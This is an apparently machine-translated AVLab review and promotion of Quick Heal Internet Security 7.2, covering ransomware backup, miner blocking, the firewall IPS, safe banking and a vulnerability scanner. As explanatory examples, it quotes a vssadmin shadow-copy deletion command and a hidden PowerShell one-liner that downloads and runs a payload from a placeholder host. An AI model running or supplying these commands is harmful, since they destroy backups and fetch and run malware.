Quick Heal Internet Security: a new anti-virus in Poland with a promo for AVLab readers

Quick Heal Internet Security BOX
Developer: Quick Heal
Product name: Quick Heal Internet Security
Tested version: 7.2


Quick Heal Internet Security (and Quick Heal Total Security) is a multi-layered protection application that meets the standards of a demanding user. It is also the answer to the whole spectrum of malware and most of the attacks that we describe on the AVLab's website.

Editor's opinion


We start unusually because from the promotion we have prepared with the Polish distributor of Quick Heal solutions: if your Quick Heal Technologies Ltd. profile is not known to you, dear Readers, this is a better opportunity to catch up and get free protection for the Quick Heal Internet Security will not be in Polish. Details can be found at the end of the article.

Until recently, only few enthusiasts in Poland have known anything about Quick Heal - providers of software and hardware for network and workstation protection from India. At the end of 2016, through the distributor ITD24 Sp. z o.o. the brand of business anti-viruses went to Poland Quick Heal Seqrite , and with it reviewed below, Quick Heal Internet Security for individual users and small businesses.

The translated interface already contains information about technical support in our country:

Quick Heal Internet Security pomoc techniczna

The Quick Heal brand software has official distribution in Poland and pre-sales and after-sales support. And although the competition is very strong, Hindus - a nation as hard-working as Poles - have not been scared. The distance of 5300km, which on the map in a straight line divides our capitals, is not something that could not be overcome in the 21st century.

Quick Heal is a large company with traditions dating back to the '90s. Currently employed over 1,300 people who are involved in the creation or delivery of comprehensive services, as well as security products for business and individual customers.

Quick Heal Internet Security interfejs

The company Quick Heal was founded in 1995. At the moment, the software of this brand has over 7.1 million active licenses in 80 countries around the world. About 1 million are Quick Heal Total Security licenses - a product targeted at individual customers and micro companies. The counting method assumes that the license, which covers the protection of eg 5 or 1000 positions, is treated as one customer. Hence the actual number of protected users is difficult to estimate.

Quick Heal employees have achieved international success, using all previous years to attract 20,000 partners and establishing numerous branches in 64 countries. Without much experience, ideas for development and effective security technologies, it would not be possible. The market very quickly verifies all imperfections, especially in the private sector, where the highest product quality and high level of services must be in the first place.

Quick Heal Technologies Ltd. operates not only in the computer industry. Strong sense of responsibility for the local community has created the willingness of the provider to help, support the development of education and protection against digital threats and the effects of using modern technologies for negative purposes. Founded in 2014, the Quick Heal Foundation is a private initiative employing over 600 volunteers. The foundation helps, among others not equipped with "medical facilities and sanitary facilities" far away from urbanized areas.

Quick Heal Foundation

Quick Heal Internet Security for Windows from 2000 and XP

When Microsoft ended support for older operating systems, replacing them with Windows 10, there are still many companies and users in the world that are not in a hurry to change to the "bullseye" - a system that is constantly updated and initially unfinished. The following statistics do not include business versions of WIndows operating systems:


According to the statistics provided, in Poland from January 2017 to the end of December 2017, Windows XP still had its supporters. Although counterattack can be seen only from the Windows 10 (41.29%) and slowly losing importance of Windows 7 (38.99%) and Windows 8.1 (11.7%), Windows XP still with a modest share of 4.24% in the market, occupies the fourth place in terms of the most popular system for desktop computers and older laptops. The lower result is only Windows 8 (2.41%) and Windows Vista (1.33%).

Quick Heal is not in a hurry to abandon support for the (most) older systems and so far there is no such official information - commented Patryk Czubasiewicz, Technical Support Engineer ITD24, the official distributor of the Quick Heal brand in Poland.

Windows XP, Vista, 7, 8 and 8.1 together make up a large chunk of the market. Therefore, it's good that someone remembers users not of the latest operating systems, who equally require uncompromising protection against malicious software.

Ransomware attacks are less, but malicious JavaScript is more and more

One of the most important functions in antivirus software is prevention and treatment of the effects after a ransomware attack. If the entire mechanism includes the entirety of protection, the second most secure way to protect data is to perform a local (or cloud) backup. Of course, the backup mechanism built into the Quick Heal virus antivirus is additionally protected against encryption and deletion, and - unlike the system mechanism - it is not possible to delete the backup with the command run by the ransomware:

"C:\Windows\SYsWOW64\cmd.exe" /C "C:\Windows\Sysnative\vssadmin.exe" Delete Shadows /All /Quiet

The number of variants and amounts of ransomware samples is not as big as it used to be:

Ransomware statystyki

For several months we have not heard about a large and spectacular attack exploiting a new vulnerability in the operating system. However, due to the damage they do, encryption viruses are still a serious threat.

Each Quick Heal antivirus software in several steps actively protects against malware, including ransomware:

  • Monitors downloaded files and components that could become a potential attack (e.g., a portion of the virus can be delivered as a downloader or Trojan).
  • Analyzes the real-time behavior of a file in the system (DNAScan).
  • Backs up data that can be restored to its original state in case the protection fails. Such a copy is encrypted with an internal algorithm developed by Quick Heal, thanks to which the data is protected against access of third processes.

The Quick Heal Internet Security solution has multi-layered security. Pre-ransomware protection is just one of several important components of protection. And as befits uncompromising protection, Quick Heal deals with spyware, adware, keyloggers, Trojans, spyware and other malware families.

Threats hidden into JavaScript code

n the last 2-3 months, we have been reporting more and more reports about detected pests extracting the Monero cryptocurrency. Cybercriminals do not focus too much on Bitcoin's currency. The Monero extraction algorithm is designed for desktop computers, unlike Bitcoin, which requires specialized hardware such as application-specific integrated circuits (ASICs) or high-end graphics processors. Therefore, it is easier to focus on this cryptocurrency, which will allow you to carry out broader campaigns that bring a steady but lower income. The second reason is the promise of the anonymity of the Monero transaction, which uses so-called stealth addresses along with the mixing of transactions, which makes the detailed transparency of the transaction and the portfolio does not exist. Monero unlike Bitcoin (which does not provide 100% anonymity, because having a BTC portfolio address can be traced to transactions) guarantees true, 100% anonymity.

The rapid increase in interest in cryptocurrencies is clearly seen in the statistics provided by ESET, where pests detected by the antivirus of this brand as JS / CoinMiner, account for as much as 33% of all detected threats in the last month in Poland:

Statystyki JavaScript miners

It is difficult to protect yourself against malicious JavaScript without the right tools. The Internet user may not even know that his computer "copies" the cryptocurrency. You can come across such "viruses" by watching TV series and films on unauthorized websites. But not only because recently similar malicious code was discovered, among others on the mobile site MobileBlackberry.com, on the Polish information service Rzeczpospolita.pl, and on the website the office of the Kołbaskowo commune . There are a lot of such examples.

You can protect by installing the appropriate extension to your browser or protecting your computer against JavaScript's excavators.

Quick Heal blokowania JavaScript miners

Do not forget about the firewall and the IDS / IPS system

If we were to replace the protection component, which is often overlooked and underestimated, but has an important function in the protection, it is a firewall with built-in intrusion protection (IDS / IPS, from Intrusive Detection System / Intrusive & nbsp; Protection System).

Quick Heal Internet Security has a similar IPS / IDS system for protection against intruders, like a hardware product Quick Heal Seqrite UTM Terminator that is designed for business. The function of blocking unauthorized attacks by the IDS / IPS module in the Quick Heal Internet Security software is enabled by default:

Quich Heal Internet Security IPS

Why is a firewall with a built-in IPS / IDS module so important? The fact that the antivirus engine protects against malicious files, probably everyone knows. However, in advanced attacks, where more sophisticated methods are used than social engineering - these are mainly attacks on unprotected and non-updated protocols (mainly SMB), browsers and browser extensions, firewalls with IPS / IDS modules play a very important role in security.

A bi-directional firewall containing an intruder detection system can detect attacks poisoning ARP tables, false PING queries, attacks modifying DNS entries, attacks on gaps on SMB, RPC, RDP and port scanning attacks. Protects your home network from malware and stops malware before it installs on your system, including protection against downloading dangerous files via CMD.exe or PowerShell.exe (system processes very often used in the malware code).

An example of malicious code that downloads the malware to the computer via the powershell.exe system:

powershell.exe -nop -w hidden -c $H=new-object net.webclient;$H.proxy=[Net.WebRequest]::GetSystemWebProxy();$H.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $H.downloadstring('hxxp://zainfekowany_zasob:8080/pobierz_payload');

The user still has the most important role to play in effective protection. Keeping track of all this information about attacks and malware is part of the work of administrators. It is not always something that an average internet user would like to do. For this reason, protective software, but multi-functional and multi-level, still remains the best investment.

If you are interested in whether Quich Heal coped in recent comparisons carried out by AVLab, then you must familiarize yourself with the protection tests: against drive-by download attacks and against viruses "fileless".

Internet banking and secure browser

At the turn of January and February 2017, we tested a few antivirus products that have so-called modules to secure online e-payments.

The purpose of this test was to check the effectiveness of protection modules , which should provide so-called "secure browsers", against hacker attacks and data theft at the time of making e-transfers and browsing websites whose security is confirmed by SSL certificates.

We admit that at that time Quick Heal anti-viruses did not play such a role in Poland as it is today. The manufacturer, having learned about the test, contacted us and assured that the Quick Heal Internet Security software would do well in this comparison.

Quick Heal Internet Security banking

In the "Safe Banking" module, we liked the protection against substitution of DNS addresses, which is additionally strengthened by the protection of the local HOSTS file (this file supports the translation of user-friendly domain names into IP addresses):

Wirtualne środowisko Bezpiecznej Bankowości z Quick Heal.

Often, there were cases when a router with poor security was "hacked" by an internet script that logged on to the default administrator credentials. DNS addresses exchanged on the router caused that Internet traffic from devices in the local network went through the server of the attacker - this one could decrypt SSL communication and read logins, passwords, as well as other important data and replace the bank websites or social networks. Data collected in this way could be used to attack friends of a hacked person.

Using Secure Banking in Quick Heal prevents such attacks. Despite the changed DNS addresses on the router, the static values on the host have priority in establishing the IP address of the server translating human-friendly addresses into the IP addresses of the websites.

In Quick Heal Internet Security, we'll find another security enhancement feature. It's a "browser" that runs in a sandbox.

Quick Heal Sandbox

In this scenario, the default browser that the user uses is run in a virtual environment inside the system. After visiting the infected site, the virus is limited to the virtual space and is not able to affect the operation of the operating system (bypassing the scenario of escape of malicious code from the sandbox as a result of security flaws). After closing the program, all changes made to this environment will be removed and will not affect the operation of the system.

Even more modules and tools

In the program, we will find even more modules that will surely find their supporters. And these are:

Quick Heal dodatkowe narzędzia

  • Protection against SPAM messages that works with installed e-mail clients. It detects viruses, malicious hyperlinks and senders impersonating trusted entities in incoming and outgoing messages.
  • A scanner detecting non-updated software that can be used to bypass security. The mechanism can detect irregularities in the operating system settings. After completing the work, detailed information about CVE vulnerability IDs is displayed, which should be appreciated by people particularly interested in security:

Quick Heal Internet Security problrmy

The Quick Heal Internet Security software lists all vulnerabilities in detail:

Quick Heal skaner podatności

Sample scan report for gaps in the system and installed software:

Security number:

Name of the vulnerability:
Vulnerability in OpenSSL 1.0.2 before 1.0.2n (CVE-2017-3737)

Threatened products:

Threatened platforms:
Microsoft Windows XP, Microsoft Windows Vista, Microsoft Windows 7,  Microsoft Windows 8, Microsoft Windows 8.1, Microsoft Windows 10, Microsoft Windows Server 2003, Microsoft Windows Server 2008, Microsoft Windows Server 2008 R2, Microsoft Windows Server 2012, Microsoft Windows Server 2012 R2, Microsoft Windows Server 2016

The vulnerability source:
Plik: C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\ssleay32.dll
Plik: C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\ssleay32.dll
Plik: C:\Program Files\VMware\VMware Tools\ssleay32.dll
Plik: C:\Program Files\VMware\VMware Tools\VMware VGAuth\ssleay32.dll

Ability to abuse and consequences:
Abuse mechanism: Network
Complexity of abuse: Medium
Abuse Authentication: None
Impact on confidentiality: Partial
Impact on integrity: None
Impact on availability: None

BID: http://www.securityfocus.com/bid/102103
SECTRACK: http://www.securitytracker.com/id/1039978
FREEBSD: https://security.FreeBSD.org/advisories/FreeBSD-SA-17:12.openssl.asc
CONFIRM: https://security.netapp.com/advisory/ntap-20171208-0001/
DEBIAN: https://www.debian.org/security/2017/dsa-4065
CONFIRM: https://www.openssl.org/news/secadv/20171207.txt

Other tools include:

  • Parental control with application control.
  • Module that restores Internet Explorer settings that have been modified by the malware.
  • Module that detects and removes temporary files and traces of Internet activity.
  • Module for creating a repair disk. < li>
  • Module for manual diagnostics of running processes (displays details about each currently running process).

Quick Heal Internet Security, it's worth it?

Let's go for a moment to the efficiency of protection. Readers, apart from tests carried out by AVLab [ 1 and 2 ], in which the Quick Heal software received the highest BEST +++ distinction, should read the ratings other IT portals and companies specializing in tests. Besides:

Quick Heal Internet Security (and a more extensive version: Quick Heal Total Security) is a multi-layered protection application that meets the standards of a demanding user. It is also the answer to a wide spectrum of malware and most of the attacks that we describe on the pages of the portal AVLab. Polish customers will certainly be pleased that the Quick Heal brand has an official distribution in our country and technical support that is performed by certified engineers. And if technical assistance in the designated zone did not meet high customer requirements, you can always use chat or email contact directly with the manufacturer. In this case, support is offered in the "follow the sun" system, ie 24 hours a day, regardless of the location in the world.

To broaden the knowledge about Quick Heal products, we recommend developing other articles about the developer of Quick Heal .

Special promotion for AVLab readers - 6 months FREE

On the occasion of the Quick Heal Internet Security review, the special promotion for AVLab readers prepared by the distributor in Poland could not be missing. This time it is not a competition, nor a one-off discount, but the action lasting until the cancellation:

By downloading the installer from this URL: http://download.quickheal.com…, everyone will be able to use the free and fully functional version of Quick Heal Internet Security for 6 months.

Add new comment

The content of this field is kept private and will not be shown publicly.

Learn more about our offer

If you sell security solutions, are a distributor, authorized partner or developer and would like to share your portfolio with a group of potential customers, advertise an event, software, hardware or other services on AVLab - simply write to us. Or maybe you had to deal with ransomware? We can also help you decrypt your files.
Read more

We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.